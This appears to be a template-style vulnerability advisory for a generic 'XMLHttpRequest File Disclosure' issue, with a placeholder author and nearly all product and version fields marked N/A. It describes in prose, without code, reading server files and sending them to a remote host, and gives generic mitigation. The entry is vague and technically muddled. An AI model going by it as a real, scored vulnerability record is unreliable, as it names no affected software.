vendor: N/A
by: John Doe
CVSS: 8.8 (HIGH)
XMLHttpRequest File Disclosure
CWE: 200
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020
XMLHttpRequest File Disclosure Vulnerability
This vulnerability allows an attacker to read sensitive files on the server by using XMLHttpRequest to send a GET request for the file. The attacker can then use XMLHttpRequest to send the file contents to a remote server and so steal them.
Mitigation:
The best way to mitigate this vulnerability is to ensure that the application does not allow requests to sensitive files. Additionally, the application should be configured to allow requests only from trusted sources.